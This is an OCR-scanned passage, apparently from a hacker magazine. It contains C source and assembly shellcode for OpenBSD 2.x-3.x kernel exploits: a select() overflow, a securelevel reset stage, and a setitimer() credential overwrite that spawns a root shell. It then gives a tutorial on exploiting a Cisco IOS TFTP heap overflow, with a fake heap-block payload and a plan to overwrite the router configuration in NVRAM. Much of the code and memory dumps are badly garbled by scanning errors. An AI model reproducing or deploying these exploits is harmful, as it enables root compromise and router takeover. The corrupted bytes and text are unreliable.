"\x42\x04\x8b\x51\x14\x89\x42\x0c\x8d\x6c\x24\x68\x0f\x01\x4£\x04\x8b" 
"\x5f£\x06\x8b\x93\x00\x04\x00\x00\x8b\x8b\x04\x04\x00\x00\xcl\xe9\x10" 


"\xcl\xel\x10\xcl\xe2\x10\xcl\xea\x 


10\x09\xca\x31\xc9\x41\x8a\xlc\x0a" 


"\x80\xfb\xe8\x75\x£7\x8d\xlc\x0a\x41\x8b\x0c\x0a\x83\xc1\x05\x01\xd9" 


"\x89\xcf£\x66\xb8\xf£\xd0\xfc\xb9\x 
"\x57\xc3"; 


void sig_handler(); 
void get_proc(pid_t, 


int 
main(int argc, 


{ 


char **argv) 


char *buf, *ptr, *fptr; 
u_long pgsz, *lptr, pprocadr; 
struct kinfo_proc kp; 


printf ("\n\n[*] 
printf("[*] by 


OpenBSD 2.x - 3.x 
Sinan \"noir\" 


Eren 


FE\xf£\xff\xff£\xf2\x66\xaf\x31\xcO" 


struct kinfo_proc *); 


RAEN ).; 
Ley Ame 


select() kernel overflow 
noir@olympos.org 


EB) ; 


printf("\n\n"); sleep(1); 
pgsz = sysconf (_SC_PAGESIZ 
fptr = buf = (char *) 
if('buf) { 


malloc(pgsz*4); 


perror ("malloc"); 


exit (-1); 
} 


memset (buf, 0x41, pgsz*4); 

buf = (char *) (((u_long)buf & “pgsz) + pgsz); 
get_proc((pid_t) getppid(), &kp); 

pprocadr = (u_long) kp.kp_eproc.e_paddr; 

ptr = (char *) (buf + pgsz - 200); /* userland adr */ 
lptr = (long *) (buf + pgsz - 8); 

*lptr 0x12345678; /* saved %ebp */ 

*lptr (u_long) ptr; /*(uadr + Oxlec0O); saved Seip */ 
shellcode[5] = pprocadr & Oxff; 

shellcode[6] = (pprocadr >> 8) & Oxff; 

shellcode[7] = (pprocadr >> 16) & Oxff; 

shellcode[8] = (pprocadr >> 24) & Oxff; 


shellcod 


memcpy (ptr, 


, 


W 
Ty 


printf("userland: 0x%.8x 


printf ("parent_proc: 


sizeof (shellcod 


Ox%.8x\n", 


)-1); 


ptr); 
pprocadr) ; 
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if( mprotect((char *) ((u_long) buf + pgsz), (size_t)pgsz, 
PROT_WRITE) < 0) { 
perror("mprotect"); 
exit (-1); 
} 
signal (SIGSEGV, (void (*) ())sig_handler) ; 
select (0x80000000, (fd_set *) ptr, NULL, NULL, NULL); 
done: 
free(fptr); 
} 
void 
sig_handler () 
{ 
exit (0); 
} 
void 
get_proc(pid_t pid, struct kinfo_proc *kp) 
{ 
u_int arr[4], len; 
arr[0] = CTL_KERN; 
arr[l] = KERN_PROC; 
arr[2] = KERN_PROC_PID; 
arr[3] = pid; 
len = sizeof(struct kinfo_proc); 
if(sysctl(arr, 4, kp, &len, NULL, 0) < 0) { 


perror ("sysctl"); 


fprintf(stderr, 


"this is an unexpected error, 


exit (-1); 
} 

} 
<--> ./ex_kernel/ex_select_obsd.c 

t+> ./ex_kernel/ex_select_obsd_secl.c 
[** 

** OpenBSD 2.x 3.x select() kernel bof exploit 
xk* 

** securelevel reset exploit, this is the second stage attack 
xk* 

** Sinan "noir" Eren 

** noir@olympos.org | noir@uberhax0r.net 
*k (ce) 2002 

xk 

xx / 

include <stdio.h> 

include <sys/types.h> 

include <sys/time.h> 

include <sys/mman.h> 

include <unistd.h> 

include <sys/param.h> 

include <sys/signal.h> 

include <sys/utsname.h> 

include <sys/stat.h> 
/* sel_sc.s shellcode */ 


unsigned char shellcode[ 


"\xe8\x04\x00\x00\x00\X78\x56\x34\x12\x5£\x8b\x1£\x31\xc0\x89\x03\x8d" 


"\x6c\x24\x68\x0f\x01\x4 


"\x8b\x04\x04\x00\x00\xcl 


F\x04\x8b\x5£\x06\x8b\x93\x00\x04\x00\x00\x8b" 
\xe9\x10\xcl\xel\x10\xcl\xe2\x10\xcl\xea\x10" 


"\x09\xca\x31\xc9\x41\x8a\xlc\x0a\x80\xfb\xe8\x75\x£7\x8d\xlc\x0a\x41" 
"\x8b\x0c\x0a\x83\xcl\x05\x01\xd9\x89\xcf\x66\xb8\xff£\xd0\xfc\xb9\xff" 


"\xff\xff\xff\xf2\x66\xa 


F\x31\xc0O\x57\xc3"; 


rerun! \n") 
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void sig_handler(); 


int 


main(int argc, char **argv) 


{ 


char *buf, *ptr, *fptr; 
u_long pgsz, *lptr, secladr; 


done 


} 


void 


if(targv[1]) { 


printf("Usage: %s secl_addr\nsecl_addr: 


"grep _securelevel\n", argv[0]); 
exit (0); 
} 


secladr = strtoul(argv[1], NULL, 16); 


pgsz = sysconf(_SC_PAGESIZE) ; 
fptr = buf = (char *) malloc(pgsz*4); 
if(!buf) { 
perror ("malloc"); 
exit(-1); 


} 
memset (buf, 0x41, pgsz*4); 


/usr/bin/nm /bsd 


buf = (char *) (((u_long)buf & “pgsz) + pgsz); 

ptr = (char *) (buf + pgsz - 200); /* userland adr */ 

lptr = (long *) (buf + pgsz - 8); 

*lptr 0x12345678; /* saved %ebp */ 

*lptr (u_long) ptr; /*(uadr + Oxlec0O); saved %eip */ 

shellcode[5] = secladr & Oxff; 

shellcode[6] = (secladr >> 8) & Oxff; 

shellcode[7] = (secladr >> 16) & Oxff; 

shellcode[8] = (secladr >> 24) & Oxff; 

memcpy (ptr, shellcode, sizeof (shellcode)-1); 

if( mprotect((char *) ((u_long) buf + pgsz), (size_t)pgsz, 

PROT_WRITE) < 0) { 

perror ("mprotect"); 
exit (-1); 

} 

signal (SIGSEGV, (void (*) ())sig_handler) ; 

select (0x80000000, (fd_set *) ptr, NULL, NULL, NULL); 


free(fptr); 


sig_handler () 


exit (0); 
} 
<--> ./ex_kernel/ex_select_obsd_secl.c 
t+> ,/ex_kernel/ex_setitimer_obsd.c 
[** 
kk 


OpenBSD 2.x 3.x setitimer () 


Sinan "noir" Eren 
noir@olympos.org | noir@uberhax0r.net 


(c) 


2002 


kernel memory write exploit 


i" 
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struct i 
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<stdio.h> 
<sys/param.h> 
<sys/proc.h> 
<sys/time.h> 
<sys/sysctl.h> 


timerval val, oval; 


int whic 


int 
main(int 


{ 


h = 0; 


argc, char **argv) 


find_which(); 
setitimer(which, &val, &oval); 
seteuid(0); 
setuid(0); 
printf ("uid: Sd euid: %d gid: %d \n", getuid(), geteuid(), getgid()); 
execl ("/bin/sh", "noir", NULL); 
} 
find_which () 


{ 


unsigned int arr[4], len; 
struct kinfo_proc kp; 


long 


stat, cred, rem; 


memset (&val, 0x00, sizeof(val)); 


val.it_interval.tv_sec = 0x00; //fill this with cr_ref 
val.it_interval.tv_usec = 0x00; 

val.it_value.tv_sec = 0x00; 

val.it_value.tv_usec = 0x00; 

arr[0] = CTL_KERN; 

arr[l] = KERN_PROC; 

arr[2] = KERN_PROC_PID; 

arr[3] = getpid(); 

len = sizeof(struct kinfo_proc); 


if(sysctl(arr, 4, &kp, &len, NULL, 0) < 0) { 
perror ("sysctl"); 
fprintf(stderr, "this is an unexpected error, rerun!\n"); 
exit(-1); 
} 


printf("proc: %p\n\n", (u_long) kp.kp_eproc.e_paddr) ; 
printf ("pc_ucred: Sp ", (u_long) kp.kp_eproc.e_pcred.pc_ucred) ; 


printf ("p_ruid: %d\n\n", (u_long) kp.kp_eproc.e_pcred.p_ruid) ; 
printf ("proc->p_cred->p_ruid: %p, proc->p_stats: %p\n", 

(char *) (kp.kp_proc.p_cred) + 4, kp.kp_proc.p_stats); 

printf ("cr_ref: d\n", (u_long) kp.kp_eproc.e_ucred.cr_ref); 


cred = (long) kp.kp_eproc.e_pcred.pc_ucred; 
stat = (long) kp.kp_proc.p_stats; 
val.it_interval.tv_sec = kp.kp_eproc.e_ucred.cr_ref; 


printf ("calculating which for u_cred:\n"); 

which = cred - stat - 0x90; 

rem = ((u_long) which%0x10); 

printf ("which: %.8x reminder: %x\n", which, rem); 


switch(rem) { 

case 0x8: 

case 0x4: 

case Oxc: 

break; 

case 0x0: 

printf ("using u_cred, we will have perminent euid=0\n"); 
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goto out; 
} 


val.it_interval.tv_sec = 0x00; 

cred = (long) ((char *) kp.kp_proc.p_cred+4) ; 
stat = (long) kp.kp_proc.p_stats; 

printf ("calculating which for u_cred:\n"); 

which = cred - stat - 0x90; 

rem = ((u_long) which%0x10) ; 

printf ("which: %.8x reminder: %x\n", which, rem); 


switch(rem) { 

case 0x8: 

case 0x4: 

printf ("too bad rem is fucked!\nlet me know about this!!\n"); 
exit (0); 

case 0x0: 

break; 

case Oxc: 

which += 0x10; 

} 
printf("\nusing p_cred instead of u_cred, only the new process " 

"will be priviliged\n"); 


out: 
which = which >> 4; 
printf ("which: %.8x\n", which) ; 
printf ("addr to overwrite: %.8x\n", stat + 0x90 + (which * 0x10)); 
} 
<--> ./ex_kernel/ex_setitimer_obsd.c 
<t++> ./ex_kernel/kernel_sc.s 
kernel level shellcod 
noir@olympos.org | noir@uberhax0r.net 
2002 
-text 


-align 2,0x90 


-globl _main 
.type _main , @function 
_main: 


call moo 

-long 0x12345678 
.long Oxdeadcafe 
.long Oxbeefdead 


nop 
nop 

nop 

moo: 

pop %edi 

mov (%edi),%ecx parent’s proc addr on ecx 


# update p_cred->p_ruid 


mov 0Ox10(%ecx), Sebx ebx = p_cred 
xor %eax, eax eax = 0 
mov %eax, 0x4 (Sebx) 

p_ruid = 0 

update pc_ucred->cr_uid 
mov (%ebx),%edx # edx = pc_ucred 
mov %eax, 0x4 (Sedx) 

cr_uid = 0 


update p_fd->fd_rdir to break chroot () 
mov Ox1l4(%ecx),%edx # edx = p_fd 

mov %eax, 0Oxc (Sedx) 

p_fd->fd_rdir = 0 
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lea 0x68 (%Sesp), %ebp 
set ebp to normal 


find where to return: sidt technique 
sidt 0x4 (%edi) 


mov Ox6(%edi),%ebx mov _idt_region in eax 

mov 0x400(%ebx) , sedx _idt_region[0x80 * (2*long) = 0x400] 
mov 0x404(%ebx),%ecx _idt_region[0x404] 

shr S$0x10,%ecx 

sal S$0x10,%ecx 


sal S$0x10,%edx 
shr S$0x10, %edx 
or Secx, $edx # edx = ecx | edx; _Xosyscall_end 


# search for Xosyscall_end+XXX: call _syscall instruction 


xOr %eECX, SECX 

up: 

inc %ecx 

movb (%edx, secx), Sbl 
empb S$0xe8, %bl 


LL 


jne up 

lea (%edx, Secx) , Sebx _Xosyscall_end+%ecx: call _syscal 
inc %ecx 

mov (%edx, %ecx) , seCcx take the displacement of the call 
add $0x5,%ecx add 5 to displacement 

add %ebx, %ecx ecx = _Xosyscall_end+0x20 + disp 


search for _syscall+0xXXX: call *%eax 
and return to where we were supposed to! 


_syscall+0x240: ff 

_syscall+0x241: do 0x240,0x241 on obsd3.1 
mov %ecx, sedi # ecx is addr of _syscall 
movw SOxd0ff, tax 
cld 
mov SOxffffffff, tecx 
repnz 
scasw #scan (%edi++) for %ax 


#return to *%edi 

xor %eax,%eax #set up the return value to Success ;) 
push %Sedi 

ret 

<--> ./ex_kernel/kernel_sc.s 

<++> ./ex_kernel/secl_sc.s 


securelevel reset shellcod 
noir@olympos.org | noir@uberhax0r.net 
2002 

-text 


-align 2,0x90 
-globl _main 
.type _main , @function 
_main: 
call moo 
-long 0x12345678 


moo: 
pop %edi 
mov (%edi),%ebx # address of securelevel 
xor %eax, %eax # eax = 0 
mov %eax, (%ebx) 

securelevel = 0 


lea 0x68 (%Sesp), %ebp 
set ebp to normal 


l ins. 
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# find where to return: sidt technique 
sidt 0x4 (%edi) 


mov Ox6(%edi),%tebx mov _idt_region in eax 

mov 0x400(%ebx) , tedx _idt_region[0x80 * (2*long) = 0x400] 
mov 0x404(%ebx),%ecx _idt_region[0x404] 

shr S$0x10,%ecx 

sal S$0x10,%ecx 


sal S$0x10,%edx 
shr S$0x10, %edx 
or Secx, $edx # edx = ecx | edx; _Xosyscall_end 


# search for Xosyscall_end+XXX: call _syscall instruction 


xor %ecx, SeCx 

up: 

inc %ecx 

movb (%Sedx, %ecx),sbl 
empb S$0xe8, %bl 


jne up 

lea (Sedx, secx) , sebx _Xosyscall_end+%ecx: call _syscall 
inc %ecx 

mov (%edx, %ecx) , seCcx take the displacement of the call ins. 
add $0x5,%ecx add 5 to displacement 

add %ebx, %ecx ecx = _Xosyscall_end+0x20 + disp 


search for _syscall+0xXXX: call *%eax 
and return to where we were supposed to! 


_syscall+0x240: ff 
_syscall+0x241: do OBSD3.1 
mov %ecx, edi # ecx is addr of _syscall 
movw SOxd0ff, %ax 
cld 
mov SOxffffffff, tecx 
repnz 
scasw #scan (%edit++) for %ax 


#return to *%edi 

xor %eax,%eax #set up the return value to Success ;) 
push %Sedi 

ret 

<--> ./ex_kernel/secl_sc.s 
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--[{ 1 - Introduction and Limitations 


This article is to introduce the reader into the fun land of exploiting a 
routing device made by Cisco Systems. It is not the final word on this 
toppic and merely reflects our research results. 


According to Cisco Systems, around 85% of all software issues in IOS are 
the direct or indirect result of memory corruptions. By the time of this 
writing, yours truly is not aware of one single case, where overflowing 
something in Cisco IOS led to a direct overwrite of a return address. 
Although there are things like stacks in IOS, it seems to be very uncommon 
for IOS coders to use local function buffers. Therefore, most (if not all) 
overflows we will encounter are some way or anyother heap based. 


As a fellow researcher used to say, bugs are not an unlimited resource. 
Especially overflow bugs in Cisco IOS are fairly rare and not easily 
compared to each other. This article will therefore limit the discussion 
to one particular bug: the Cisco IOS TFTIP server filename overflow. When 
using your router as a TFTP server for files in the flash filesystem, a 
TFTIP GET request with a long (700 characters) filename will cause the 
router to crash. This happens in all IOS versions from 11.1 to 11.3. The 
reader might argue the point that this is no longer a widely used branch, 
but yours truly asks you to bare with him to the end of this article. 


The research results and methods presented here were collected during 
inspection and exploitation attempts using the already mentioned TFTP bug. 
By the time of this writing, other bugs are researched and different 
approaches are tested, but the here presented procedure is still seen as 
the most promising for widespread use. This translates to: use your 
favorite private Cisco IOS overflow and try it. 


--[ 2 - Identification of an overflow 


While the reader is probably used to identify stack smashing in a split 
second on a commonly used operating system, he might have difficulties 
identifying an overflow in IOS. As yours truly already mentioned, most 
overflows are heap based. There are two different ways in IOS to identify 
a heap overflow when it happens. Being connected to the console, the 
reader might see output like this: 


01:14:16: %SYS-3-OVERRUN: Block overrun at 2CO1E14 (red zone 41414141) 
—-Traceback= 80CCC46 80CE776 80CFIBA 80CF300 
01:14:16: SSYS-6-MTRACE: mallocfree: addr, pc 
20E3ADC, 80CA1D8 20DFBEO, 80CA1D8 20CF4FC, 80CA1D8 20C851C, 80CA1D8 
20C6F20, 80CA1D8 20B43FC, 80CA1D8 20AE130, 80CA1D8 2075214, 80CA1D8 
01:14:16: SSYS-6-MTRACE: mallocfree: addr, pc 
20651E0, 80CA1D8 205EF04, 80CA1D8 205B338, 80CA1D8 205AB80, 80CA1D8 
20AFCF8, 80CA1C6 205A664, 80CA1D8 20AC56C, 80CA1C6 20B1A88, 80CA1C6 
01:14:16: SSYS-6-BLKINFO: Corrupted redzone blk 2C01E14, words 382, 


alloc 80ABBFC, InUse, dealloc 206E2F0, rfcnt 1 
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In this case, an IOS process called "Check heaps", of which we will hear 
a lot more later, has identified a problem in the heap structures. After 
doing so, “Check heaps" will cause what we call a software forced crash. 
It means that the process kills the Cisco and makes it reboot in order 

to get rid of the problem. We all know this behavior from users of 

MS-DOS or Windows based systems. What happend here is that an A-Strip 
overwrote a boundary between two heap memory blocks. This is protected by 
what Cisco calls a "RED ZONE", which in fact is just a static canary. 


The other way a heap overflow could manifest itself on your console is an 
access violation: 


*A* BUS? ERROR. * 4% 

access address = 0x5f227998 

program counter = 0x80ad45a 

status register = 0x2700 

vbr at time of exception = 0x4000000 
special status word = 0x0045 

faulted cycle was a longword read 


This is the case when you are lucky and half of the work is already done. 
IOS used a value that you somehow influenced and referenced to not 
readable memory. Unfortunately, those overflows are later harder to 
exploit, since tracking is a lot more difficult. 


At this point in time, you should try to figure out under which exact 
circumstances the overflow happens - pretty much like with every other bug 
you find. If the lower limit of your buffer size changes, try to make sure 
that you don’t play with the console or telnet(1) connections to the router 
during your tests. The best is always to test the buffer length with a just 
rebooted router. While it doesn’t change much for most overflows, some 
react differently when the system is freshly rebooted compared to a system 
in use. 


--[ 3 - IOS memory layout sniplets 


To get any further with the overflow, we need to look at the way IOS 
organizes memory. There are basically two main areas in IOS: process memory 
and IO memory. The later is used for packet buffers, interface ring buffers 
and so on and can be of interest for exploitation but does not provide some 
of the critical things we are looking for. The process memory on the other 
hand behaves a lot like dynamic heap memory in Linux. 


Memory in IOS is split up in blocks. There seems to be a number of pointer 
tables and meta structures dealing with the memory blocks and making sure 
IOS can access them in an efficient way. But at the end of the day, the 
blocks are hold together in a linked list structure and store their 
management information mostly inline. This means, every memory block has 

a header, which contains information about the block, it’s previous one 
and the next one in the list. 


aera Block A <-. 


+-> Block B —-+ 


Block C 


The command "show memory processor" clearly shows the linked list 
structure. 


A memory block itself consists of the block header with all the inline 
management information, the data part where the actual data is stored 
and the red zone, which we already encountered. The format is as follows: 


|<- 32 bit ->| Comment 
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MAGIC Static value 0xAB1234CD 
PID IOS process ID 
Alloc Check Area the allocating process uses for checks 
Alloc name Pointer to string with process name 
Alloc PC Code address that allocated this block 
NEXT BLOCK Pointer to the next block 
PREV BLOCK Pointer to the previous block 
BLOCK SIZE Size of the block (MSB marks "in use") 
Reference # Reference count (again ???) 
Last Deallc Last deallocation address 

DATA 
RED ZONE Static value OxFDO110DF 


In case this memory block is used, the size field will have it’s most 
Significant bit set to one. The size is represented in words (2 bytes), 
and does not include the block overhead. The reference count field is 
obviously designed to keep track of the number of processes using this 
block, but yours truly has never seen this being something else then 1 
or 0. Also, there seem to be no checks for this field in place. 


In case the memory block is not used, some more management data is 
introduced at the point where the real data was stored before: 


[BLOCK HEAD] 

MAGIC2 Static value OxDEADBEEE 

Somestuff 

PADDING 

PADDING 

FREE NEXT Pointer to the next free block 
FREE PREV Pointer to the previous free block 
RED ZONE Static value OxFDO110DF 


Therefore, a free block is an element in two different linked lists: 

One for the blocks in general (free or not), another one for the list of 
free memory blocks. In this case, the reference count will be zero and 

the MSB of the size field is not set. Additionally, if a block was used 

at least once, the data part of the block will be filled with OxODODODOD. 
IOS actually overwrites the block data when a free() takes place to prevent 
software issues from getting out of hand. 


At this point, yours truly would like to return to the toppic of the "Check 
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heaps" process. It is here to run about once a minute and checks the doubly 
linked lists of blocks. It basically walks them down from top to buttom to 
see if everything is fine. The tests employed seem to be pretty extensiv 
compared to common operating systems such as Linux. As far as yours truly 
knows, this is what it checks: 

1) Doest the block being with MAGIC (0xAB1234CD) ? 

2) If the block is in use (MSB in size field is set), check if the 

red zone is there and contains OxFDO110DF. 

3) Is the PREV pointer not NULL? 

4) If there is a NEXT pointer ... 

4.1) Does it point right after the end of this block? 

4.2) Does the PREV pointer in the block pointed to by NEXT point 

back to this block’s NEXT pointer? 

5) If the NEXT pointer is NULL, does this block end at a memory 
region/pool boundary [NOTE: not sure about this one]. 
6) Does the size make sense? [NOTE: The exact test done here is 

still unknown] 


If one of these tests is not satisfied, IOS will declare itself unhappy and 
perform a software forced crash. To some extend, one can find out which 
test failed by taking a look at the console output line that says 
"validblock_diagnose = 1". The number indicates what could be called "class 
of tests", where 1 means that the MAGIC was not correct, 3 means that the 
address is not in any memory pool and 5 is really a bunch of tests but 
mostly indicates that the tests lined out in point 4.1 and 4.2 failed. 


[ 4 A fr () exploit materializes 


Now that we know a bit about the IOS memory structure, we can plan to 
overflow with some more interesting data than just 0x41. The basic idea is 
to overwrite the next block header, hereby provide some data to I0S, and 
let it work with this data in a way that gives us control over the CPU. How 
this is usually done is explained in [1]. The most important difference 
here is, that we first have to make "Check heaps" happy. Unfortunately, 
some of the checks are also performed when memory is allocated or free()ed. 
Therefore, slipping under the timeline of one minute between two "Check 
heaps" runs is not an option here. 


[The biggest problems are the PREV pointer check and the size field. Since 
the vulnerability we are working with here is a string overflow, we also 
have the problem of not being able to use 0x00 bytes. Let’s try to deal 
with the issues we have one by one. 


The PREV pointer has to be correct. Yours truly has not found any way to 
use arbitrary values here. The check outlined in the checklist as 4.2 is a 
serious problem, since it is done on the block we are sitting in - not the 
one we are overflowing. To illustrate the situation: 


Block Head 


AAAAAAAAAAAA <--- You are here 
AAAAAAAAAAAA 
AAAAAAAAAAAA 


RED ZONE <--- Your data here 


Block Head 


We will call the uppermost block, who’s data part we are overflowing, the 

"host block", because it basically "hosts" our evildoing. For the sake of 

clarity, we will call the overwritten block header the "fake block", since 
we try to fake it’s contents. 


So, when "Check heaps" or comparable checks during malloc() and free() are 
performed on our host block, the overwrite is already noticed. First of 
all, we have to append the red zone canary to our buffer. If we overflow 
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5 
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or totally ignored (PID, Alloc ptrs). 


Assumed we overwrite RED ZONE, MAGIC, P 
and PREV, a check performed on the host 
software forced crash, since the PREV p 
block does not point back to the host b 
deal with this issue: we crash the devi 


the values ar ither static (MAGIC) 


ID, the three Alloc pointer, NEXT 
block will already trigger a 
ointer we overwrote in the next 
lock. We have only one way today to 
ce. The reason behind this is, that 


we put it in a fairly predictable memor 


is more or less structured the same way. 


y state. After a reboot, the memory 
This also depends on the amount 


of memory available in the device we ar 
good solution. When crashing the device 
can try to grab logging information off 
such a thing is configured. Yours truly 
this prevents real-world application of 
let’s just assume you can read the cons 


Now that we know the PREV pointer to pu 
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the first time with an A-Strip, we 
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ole output. 


t into the fake block, let’s go on. 
ave to deal with the size field. The 


For now ignoring the NEXT pointer, we h 
fact that this is a 32bit field and we 
us from putting reasonable numbers in t 
block would be 0x80010101 and for an un 
more than IOS would accept. But to make 
Ox7FFFFFFF in there will pass the siz 


are doing a string overflow prevents 
here. The smallest number for a used 
used one 0x01010101. This is much 

a long story short, putting 

field checks. As simple as that. 


In this particular case, as with many a 
in IOS, our host block is one of the la 


pplication level service overflows 
st blocks in the chain. The most 


simple case is when the host block is t 
this is the case with the TFTP server o 
involves creating more than one fake bl 


he next-to-last block. And viola, 
verflow. In other cases, the attack 
ock header and becomes increasingly 


complicated but not impossible. But from this point on, the discussion is 


pretty much centered around the specifi 


Assumed normal operation, IOS will allo 
requested file name. The block after th 
When IOS is done with the TFTP operatio 
allocated. Then, it will find out that 
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In the IOS memory list, there is an element called the "Process Array". 
This is a list of pointers one for every process currently running in 


Ios. 


You can find it’s location by issuing a "show memory processor 


allocating-process" command (output trimmed): 


radio#show memory processor allocating-process 


Proces 


Address Bytes P 
258AD20 
258B32C 


258F998 
258FDCC 
25901E0 
25903F4 


This 


1504 0 
3004 2 


1032 2 
1000 2 
488 2 
128 2 


sor memory 


rev. Next Ref Alloc Proc Alloc PC What 

258B32C oe AIT EA 20D62F0 ist Elements 
58AD20 258BF14 i Ee 20D6316 List 
58F914 258FDCC Ln 20E5108 Process Array 
58F998 25901E0 1 Load Meter 20E54BA Process Stack 
58FDCC 25903F4 1 Load Meter 20E54CC Process 
5901E0 25904A0 1 Load Meter 20DDI1CE Process Events 


"Process Array" can be displayed by the "show memory" command: 


radio#show memory 0x258F998 
0258F990: 
O258F9A0: 
O258F9B0: 
O258F9C0: 
O258F9D0: 
O258F9E0: 
O258F9F0: 
O258FA00: 
O258FA10: 
0258FA20: 
0258FA30: 
O258FA40: 
O258FA50: 
O258FA60: 


000000 
O258F9 
000000 


ae 
02596F3C 02598208 O25A0A04 025A2F34 .Yo<.Y...2...2/4 
[ 


O25AC1 


O25E6FFO O025E949C O25EA95C 025EC484 .%*op.%*...% 


O25EF4 
026343 
026435 
026527 
026578 


AB1234CD FFFFFFFE AM 5 es. 
00 O20E50B6 020E5108 O258FDCC  ...... P6..Q..X}L 
28 80000206 00000001 O20H1778 .Xy(........... x 


00 00000028 02590208 O025D74CO ....... (. 


FC 025BD554 025BE920 O25BFD2C .ZA|.{[UT. 


04 0262F628 026310DC 02632FD8 .*t..bv(.c.\.c/X 
50 02635634 0263F7A8 026418C0O .cCP.cV4.cw(.d.@ 
FC 026475E0 O025D7A38 026507E8 .d5|.du*.)]z8.e.h 
DC 02652AF4 02657200 02657518 .e’\.e*t.er..eu. 
30 02657B48 02657E60 0269DCFC .ex0.e{H.e7~*.i\| 


O269EFEO O026A02C4 025DD870 00000000 .io*.j.D.]Xp.... 


000000 


00 025C3358 026695EC 0266A370 ..... \3X.f£.1.f#p 


While you also see the already discussed block header format in action now, 
the interesting information starts at 0x0258F9C4. Here, you find the number 
of processes currently running on IOS. They are ordered by their process 
ID. What we are looking for is a process that gets executed every once in a 
while. The reason for this is, if we modify something in the process data 


structures, 


we don’t want the process being active at this point in time, 


so that the location we are overwriting is static. For this reason, yours 
truly pick 
load and is fired off about every 30 seconds. Let’s get the PID of 
"Load Meter": 


ed the 


"Load Meter" process, which is there to measure the system 


radio#tshow processes cpu 
CPU utilization for five seconds: 2%/0%; one minute: 3%; five minutes: 3% 


PID Runtime (ms) Invoked uSecs 5Sec 1Min 5Min TTY Process 
ab 80 1765 45 0.00% 0.00% 0.00% Q Load Meter 
Well, conveniently, this process has PID 1. Now, we check the memory 


location the "Pr 
location 


ocess Array" points to. Yours truly calls this memory 


"process record", since it seems to contain everything IOS needs 


to know about the process. The first two entries in the record are: 


radio#tsh mem 0x02590208 
02590200: 
02590210: 
02590220: 


Th 


second 


000013 
000000 


The first entry 
You can compare 
Stack" on 


it in 
lem 


O258FDF4 025901AC -X}t.Y., 
88 O020E488E 00000000 00000000 ...... Pye leite heen does 
00 00000000 00000000 OODDODOO ................ 


in this record is 0x0258FDF4, which is the process stack. 
this to the line above that says "Load Meter" and "Process 
the output of "Show memory processor allocating-process". 
nt is the current stack pointer of this process 
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(Ox025901AC). By now it should also be clear why we want to pick a process 
with low activity. But surprisingly, the same procedure also works quite 
well with busier processes such as "IP Input". Inspecting the location of 
the stack pointer, we s something quite familiar: 


radio#sh mem 0x025901AC 
025901A0: 025901C4 YD 
025901B0: 020DC478 O256CAF8 025902DE 00000000 ..Dx.VIx.Y.%.... 


This is classic C calling convention: first we find the former frame 
pointer and then we find the return address. Therefore, 0x025901B0 is the 
address we are targeting to overwrite with a pointer supplied by us. 


The only question left is: Where do we want the return address to point to? 
As already mentioned, IOS will overwrite the buffer we are filling with 
OxODODODOD when the free() is executed - so this is not a good place to 
have your code in. On the other hand, the fake block’s data section is 
already considered clean from IOS’s point of view, so we just append our 
code to the fake block header we already have to send. But what’s the 


address of this? Well, since we have to know the previous pointer, we can 
calculate the address of our code as offset to this one - and it turns out 
that this is actually a static number in this case. There are other, more 


advanced methods to deliver the code to the device, but let’s keep focused. 


The TFTIP filename we are asking for should now have the form of: 


AAAAAAAAAAAA 


AAAAAAAAAAAA 


FAKE BLOCK 


CODE 


At this point, we can build the fake block using all the information we 
gathered: 


char fakeblock[] = 
"\ xFD\x01\x10\xDF" // RED 
"\ xAB\x12\x34\xCD" // MAGIC 
"\ xFF\XFF\xXFF\xXFE" // PID 
"\x80\x81\x82\x83" // 
"\x08\x0C\xBB\x76" // NAME 
"\x80\x8a\x8b\x8c" // 
"\x02\x0F\x2A\x04" // NEXT 
"\x02\x0F\x16\x94" // PREV 
"\x7F\XFF\XFF\xFE" // SIZE 
"\x01\x01\x01\x01" // 
"\xA0\xA0\xA0\xA0" // padding 
"\ xDE\XAD\XBE\xXEF" // MAGIC2 
"\x8A\x8B\x8C\x8D" // 
"\xFF\XFF\XFF\XxFE" // padding 
"\ xPF\XFF\XFF\xFE" // padding 
"\x02\x0F\xX2A\x24" // FREE NEXT (in BUFFER) 

EF PREV (Load Meter return addr) 


"\x02\x59\x01\xBO" // FREE 


’ 


When sending this to the Cisco, you are likely to see something like this: 
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**A* EXCEPTION: *** 

illegal instruction interrupt 
program counter = 0x20f2a24 

status register = 0x2700 

vbr at time of exception = 0x4000000 


depending on what comes after your fake block header. Of course, we did not 
provide code for execution yet. But at this point in time, we got the CPU 
redirected into our buffer. 


--[ 5 - Writing (shell)code for Cisco 


Before one can write code for the Cisco platform, you have to decide on the 
general processor architecture you are attacking. For the purpose of this 
paper, we will focus on the lower range devices running on Motorola 68k 
CPUs. 


Now the question is, what do you want to do with your code on the system. 
Classic shell code design for commonly used operating system platforms uses 
syscalls or library functions to perform some port binding and provide 
shell access to the attacker. The problem with Cisco IOS is, that we will 
have a hard time keeping it alive after we performed our pointer games. 
This is because in contrast to "normal" daemons, we destroyed the memory 
management of the operating system core and we can not expect it to cope 
with the mess we left for it. 


Additionally, the design of IOS does not feature transparent syscalls as 
far as yours truly knows. Because of it’s monolithic design, things are 
linked together at build time. There might be ways to call different 
subfunctions of IOS even after an heap overflow attack, but it appears to 
be an inefficient route to take for exploitation and would make the whole 
process even more instable. 


The other way is to change the routers configuration and reboot it, so it 
will come up with the new config, which you provided. This is far more 
simpler than trying to figure out syscalls or call stack setups. The idea 
behind this approach is, that you don’t need any IOS functionality anymore. 
Because of this, you don’t have to figure out addresses and other vital 
information about the IOS. All you have to know is which NVRAM chips are 
used in the box and where there are mapped. This might sound way more 
complicated than identifying functions in an IOS image - but is not. In 
contrast to common operating systems on PC platforms, where the number of 
possible hardware combinations and memory mappings by far exceedes a 
feasable mapping range, it’s the other way around for Cisco routers. You 
can have more than ten different IOS images on a single platform - and this 
is only one branch - but you always have the same general memory layout and 
the ICs don’t change for the most part. The only thing that may differ 
between two boxes are the modules and the size of available memory (RAM, 
NVRAM and Flash), but this is not of big concern for us. 


The non-volatile random access memory (NVRAM) stores the configuration of a 
Cisco router in most cases. The configuration itself is stored in plain 
text as one continious C-style string or text file and is terminated by the 
keyword ’end’ and one or more 0x00 bytes. A header structure contains 
information like the IOS version that created this configuration, the size 
of it and a checksum. If we replace the config on the NVRAM with our own 
and calculate the numbers for the header structure correctly, the router 
will use our IP addresses, routings, access lists and (most important) 
passwords next time it reloads. 


As one can see on the memory maps [2], there are one (in the worst case 
two) possible memory addresses for the NVRAM for each platform. Since 

the NVRAM is mapped into the memory just like most memory chips are, we 

can access it with simple memory move operations. Therefore, the only thing 
